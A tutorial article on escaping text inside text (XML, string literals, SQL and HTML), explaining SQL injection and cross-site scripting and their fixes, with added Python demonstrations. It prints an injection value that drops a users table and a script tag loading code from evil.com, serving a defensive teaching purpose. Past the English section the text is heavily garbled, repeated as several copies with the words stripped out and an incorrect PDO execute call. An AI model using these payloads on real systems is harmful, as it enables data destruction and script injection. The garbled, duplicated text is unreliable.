Escaping (or what you need to know to work with text inside text)

SQL injection, cross-site request forgery, broken XML... This article covers the basic concept behind all of these: handling strings, and strings inside strings.



The main problem



This is just text. Yes, just text, and that is the main problem. Almost everything in a computer system is represented as text (and text, in turn, as bytes). Some text is meant for computers, some for people, but both kinds are still text. To see what I mean, here is a small example.

    <?xml version="1.0" encoding="UTF-8" ?>
    <article>
      <author>Homo Sapiens</author>
      <contents>
        Suppose, there is the English text, which I don't wanna translate into Russian
      </contents>
    </article>





Don't believe me? This is text. Some people call it XML, but it is just text. It may not be fit to show to your English teacher, but it is still just text. You can print it on a poster and take it to a meeting, you can write it in a letter to your mother... this is text.



However, we want certain parts of this text to mean something to the computer. We want the computer to be able to pull out the author and the text itself separately, so that it can do something with them. For instance, turn the above into:

    Suppose, there is the English text, which I don't wanna translate into Russian
    by Homo Sapiens





How does the computer do this? Because the specific parts of the text are neatly wrapped in special words enclosed in funny brackets, such as <author>. Having done this, we can write a program that looks for these parts, extracts the text, and uses it for some invention of its own.



In other words, by following certain rules inside the text, we mark out a special meaning that anyone who follows the same rules can make use of.

Now, this is not so hard to understand. But what if we want to use these funny brackets in the text, which carry a special meaning, without that meaning? Something like this:

    <?xml version="1.0" encoding="UTF-8" ?>
    <article>
      <author>Homo Sapiens</author>
      <contents>
        Basic math tells us that if x < n and y > n, x cannot be larger than y.
      </contents>
    </article>





The characters "<" and ">" are not special in themselves. As in the example above, they can legitimately appear anywhere, in any text. But then what about our idea of special words like <author>? XML's answer is this:

    <?xml version="1.0" encoding="UTF-8" ?>
    <article>
      <author>Homo Sapiens</author>
      <contents>
        Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y.
      </contents>
    </article>






, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]





What about the ampersand (&) itself? What if the text has to contain a literal "&lt;" rather than "<"? In XML the ampersand is escaped too, as "&amp;", so a literal "&lt;" in the text is written "&amp;lt;".





XML is not the only "text inside text" case. Take string literals in a programming language:

    var name = "Homo Sapiens";
    var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";





    var name = "Homo Sapiens";
    var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";





But what if the text itself contains quotes?

    var name = "Homo Sapiens";
    var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";





The string ends at the second quote and what follows is garbage. The fix is the same idea as in XML: mark the quote that is "just text" with a backslash.

    var name = "Homo Sapiens";
    var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";





Now "\" has become the special character. A literal backslash therefore has to be escaped as well: "\\".



Now for SQL. A SQL query is also just text:

    SELECT phone_number FROM users WHERE name = 'Alex'





In a program, that query is itself a string inside the program text:

    $query = "SELECT phone_number FROM users WHERE name = 'Alex'";
    $result = mysql_query($query);








Now let the name come from the user:

    $name = $_POST['name'];
    $query = "SELECT phone_number FROM users WHERE name = '$name'";
    $result = mysql_query($query);





Let's see what the query becomes for a few values of $_POST['name']:



    Input: Alex
    Query: SELECT phone_number FROM users WHERE name = 'Alex'

    Input: Mc'Donalds
    Query: SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

    Input: Joe'; DROP TABLE users; --
    Query: SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'





Case 2 is already broken: the apostrophe in the name closes the string literal early and the query fails with a syntax error. Case 3 is worse: the query looks up Joe, then drops the users table, and the "--" turns the leftover closing quote into a comment.






The second example is XSS, this time in HTML. Suppose a site renders user posts with a template like this:

    <div class="post">
      <p class="meta">
        Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?>
      </p>
      <p class="body">
        <?php echo $post['body']; ?>
      </p>
    </div>





With ordinary content it renders like this:

    <div class="post">
      <p class="meta">
        Posted by Plato on January 2, 15:31
      </p>
      <p class="body">
        I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat."
      </p>
    </div>





Another post, this time with angle brackets in it:

    <div class="post">
      <p class="meta">
        Posted by Pascal on November 23, 04:12
      </p>
      <p class="body">
        Basic math tells us that if x < n and y > n, x cannot be larger than y.
      </p>
    </div>





But what if someone posts this?

    <div class="post">
      <p class="meta">
        Posted by JackTR on July 18, 12:56
      </p>
      <p class="body">
        <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script>
      </p>
    </div>





The script tag is now part of the page, and every visitor's browser loads and runs the JavaScript from evil.com. The same problem as before: text that was meant as data is read as instructions. The remedy is the same too: escape the text for the context it is placed into.

Here is the SQL example again, this time escaping the name before it goes into the query:

    $name = $_POST['name'];
    $name = mysql_real_escape_string($name);
    $query = "SELECT phone_number FROM users WHERE name = '$name'";
    $result = mysql_query($query);





Now the same inputs give:

    Input: Alex
    Query: SELECT phone_number FROM users WHERE name = 'Alex'

    Input: Mc'Donalds
    Query: SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

    Input: Joe'; DROP TABLE users; --
    Query: SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'





mysql_real_escape_string escapes the characters that are special inside a MySQL string literal, so the quote in the name is read as part of the name rather than as the end of the literal.



And the HTML template with escaping:

    <div class="post">
      <p class="meta">
        Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?>
      </p>
      <p class="body">
        <?php echo htmlspecialchars($post['body']); ?>
      </p>
    </div>





htmlspecialchars replaces <, >, & and quotes with their HTML entities. The JackTR post now renders as:

    <div class="post">
      <p class="meta">
        Posted by JackTR on July 18, 12:56
      </p>
      <p class="body">
        &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt;
      </p>
    </div>
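As an added example (not code from the original article), the XML document from the top of the page and the post template from this section are built with and without escaping in Python; function and variable names are my own, the sample texts are the article's, and html.escape stands in for htmlspecialchars.

```python
import html
from xml.etree import ElementTree as ET
from xml.sax.saxutils import escape as xml_escape

# Constructed sample data, modelled on the article's examples.
AUTHOR = "Homo Sapiens"
MATH_TEXT = "Basic math tells us that if x < n and y > n, x cannot be larger than y."
SCRIPT_POST = ('<script src="http://evil.com/dangerous.js" type="text/javascript" '
               'charset="utf-8"></script>')

XML_TEMPLATE = ('<?xml version="1.0" encoding="UTF-8" ?>'
                '<article><author>{author}</author><contents>{contents}</contents></article>')


def build_article(author, contents, escape=True):
    """Wrap author and contents in the article markup.  escape=False pastes the raw
    text in as-is, which is where the article's trouble starts."""
    if escape:
        author, contents = xml_escape(author), xml_escape(contents)
    return XML_TEMPLATE.format(author=author, contents=contents)


def is_well_formed(article_xml):
    """True if an XML parser accepts the document; a bare '<' in text makes it False."""
    try:
        ET.fromstring(article_xml.encode("utf-8"))
    except ET.ParseError:
        return False
    return True


def extract(article_xml):
    """Parse and return (author, contents).  The parser decides what is markup and
    what is text, and turns &lt; &gt; &amp; back into the characters they stand for."""
    root = ET.fromstring(article_xml.encode("utf-8"))
    return root.findtext("author"), root.findtext("contents")


def render_post(username, body, escape=True):
    """The article's post template.  html.escape plays the role of htmlspecialchars
    (it also turns ' into &#x27;, which htmlspecialchars only does with ENT_QUOTES)."""
    if escape:
        username, body = html.escape(username), html.escape(body)
    return (f'<div class="post"><p class="meta">Posted by {username}</p>'
            f'<p class="body">{body}</p></div>')


if __name__ == "__main__":
    raw = build_article(AUTHOR, MATH_TEXT, escape=False)
    print("unescaped XML well-formed?", is_well_formed(raw))        # False
    safe = build_article(AUTHOR, MATH_TEXT)
    print(safe)
    print("round trip:", extract(safe) == (AUTHOR, MATH_TEXT))       # True
    # Escaping is per boundary: text that already reads "&lt;" is escaped again
    # (to "&amp;lt;") and comes back out of the parser as the literal "&lt;".
    print(extract(build_article(AUTHOR, xml_escape("a < b")))[1])    # a &lt; b
    print(render_post("JackTR", SCRIPT_POST, escape=False))          # live script tag
    print(render_post("JackTR", SCRIPT_POST))                        # harmless text
```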





The browser now shows the script tag as text instead of executing it.

The rule is simple: escape for the context the text is going into. Text going into SQL is escaped for SQL, text going into HTML is escaped for HTML, and so on for every other "text inside text" format.





A few related techniques deserve a mention:

Validation

Check that the input is what you expect: for a field that must hold a number, "DROP TABLE users" fails the check while "42" passes. Validation narrows what can get in, but it does not replace HTML/SQL escaping, because valid input can still contain characters that are special in the target context.

Sanitization

Sanitization removes or rewrites the parts of the input that are not allowed, for instance stripping HTML tags from a comment. It changes the data, so it is a different tool from escaping, which preserves the data and only changes how it is written down.





Prepared SQL statements

With prepared statements the query text and the data travel to the database separately, so the data is never parsed as SQL:

    $stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?');
    $stmt->execute([$_POST['name']]);  // PDOStatement::execute takes the parameters as an array
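An added Python example, not the article's own PHP: it builds the three queries from the SQL section by interpolation, with a simplified stand-in for mysql_real_escape_string (my own approximation, not MySQL's implementation), and then runs the same lookups as a prepared statement against an in-memory SQLite table with constructed rows. Function names are mine.

```python
import sqlite3

# Constructed sample inputs: the three cases the article walks through.
INPUTS = ["Alex", "Mc'Donalds", "Joe'; DROP TABLE users; --"]

QUERY_TEMPLATE = "SELECT phone_number FROM users WHERE name = '{name}'"


def build_query_by_interpolation(name):
    """The article's vulnerable pattern: the name is pasted into the SQL text, so
    any quote in it changes the structure of the statement.  Returns text only."""
    return QUERY_TEMPLATE.format(name=name)


# Simplified stand-in for mysql_real_escape_string (assumption: the characters
# MySQL's string-literal escaping handles; real code should call the driver).
_MYSQL_ESCAPES = {"\\": "\\\\", "'": "\\'", '"': '\\"',
                  "\n": "\\n", "\r": "\\r", "\0": "\\0", "\x1a": "\\Z"}


def mysql_style_escape(text):
    """Backslash-escape the characters that would end or alter a MySQL string literal."""
    return text.translate(str.maketrans(_MYSQL_ESCAPES))


def build_query_with_escaping(name):
    """The article's second version: the name is escaped for the SQL string context.
    The result is MySQL syntax and is deliberately not executed against SQLite."""
    return QUERY_TEMPLATE.format(name=mysql_style_escape(name))


def open_sample_db():
    """In-memory SQLite users table with two constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT PRIMARY KEY, phone_number TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("Alex", "555-0100"), ("Mc'Donalds", "555-0199")])
    conn.commit()
    return conn


def naive_lookup(conn, name):
    """Execute the interpolated query.  Returns the phone number, None when no row
    matches, or 'error: ...' when the pasted text breaks the statement (case 2)."""
    try:
        row = conn.execute(build_query_by_interpolation(name)).fetchone()
    except sqlite3.Error as exc:
        return f"error: {exc}"
    return row[0] if row else None


def prepared_lookup(conn, name):
    """Prepared statement: the SQL text is fixed and the name is bound as a
    parameter, so the database never parses it as SQL."""
    row = conn.execute("SELECT phone_number FROM users WHERE name = ?", (name,)).fetchone()
    return row[0] if row else None


def table_exists(conn, table):
    row = conn.execute("SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?",
                       (table,)).fetchone()
    return row is not None


if __name__ == "__main__":
    conn = open_sample_db()
    for name in INPUTS:
        print("input:           ", name)
        print("interpolated:    ", build_query_by_interpolation(name))
        print("escaped (MySQL): ", build_query_with_escaping(name))
        print("prepared result: ", prepared_lookup(conn, name))
    # The legitimate apostrophe already breaks the naive version; case 3 is not run.
    print("naive Alex:      ", naive_lookup(conn, "Alex"))
    print("naive Mc'Donalds:", naive_lookup(conn, "Mc'Donalds"))
    print("users table still exists:", table_exists(conn, "users"))
```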













? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>






, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]





, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp;



", .. : " &amp;&lt;



"





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";





- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";





! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";





... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";





"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'





, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);





, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);





, : - -! , - ! ! , - , ! !



, . $_POST['name']



- , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'





Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'





Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'





, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>





, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>





, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>





... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>





, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);





, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'





Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'





Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'





mysql_real_escape_string



, - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>





htmlspecialchars



, , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>





, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .





Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);





, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).








 ?   ,    -  ?  XML -  .   .  .       ,  -      ,         i    . 
      

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>






, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]





, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp;



", .. : " &amp;&lt;



"





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";





- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";





! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";





... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";





"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'





, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);





, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);





, : - -! , - ! ! , - , ! !



, . $_POST['name']



- , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'





Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'





Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'





, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>





, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>





, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>





... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>





, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);





, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'





Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'





Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'





mysql_real_escape_string



, - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>





htmlspecialchars



, , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>





, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .





Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);





, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).








? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>






, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]





, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp;



", .. : " &amp;&lt;



"





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";





- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";





! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";





... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";





"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'





, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);





, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);





, : - -! , - ! ! , - , ! !



, . $_POST['name']



- , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'





Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'





Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'





, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>





, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>





, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>





... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>





, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);





, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'





Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'





Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'





mysql_real_escape_string



, - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>





htmlspecialchars



, , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>





, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .





Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);





, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).








? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>






, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]





, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp;



", .. : " &amp;&lt;



"





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";





- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";





! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";





... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";





"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'





, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);





, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);





, : - -! , - ! ! , - , ! !



, . $_POST['name']



- , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'





Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'





Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'





, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>





, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>





, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>





... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>





, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);





, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'





Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'





Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'





mysql_real_escape_string



, - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>





htmlspecialchars



, , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>





, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .





Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);





, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).








? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>






, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]





, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp;



", .. : " &amp;&lt;



"





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";





- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";





! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";





... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";





"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'





, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);





